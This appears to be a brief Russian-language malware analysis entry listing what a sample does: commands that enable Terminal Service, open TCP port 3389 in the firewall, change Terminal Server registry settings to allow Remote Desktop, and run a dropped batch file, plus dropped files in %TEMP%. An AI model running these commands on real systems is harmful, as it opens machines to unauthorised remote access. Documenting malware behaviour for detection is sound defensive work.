Техническая информация
- <SYSTEM32>\sc.exe config TermService start=auto
- <SYSTEM32>\net1.exe start Termservice
- <SYSTEM32>\netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\retpcshell_1.2.bat" <Текущая директория>\"
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
- %TEMP%\1.tmp\c001.reg
- %TEMP%\1.tmp\bue.exe
- %TEMP%\1.tmp\retpcshell_1.2.bat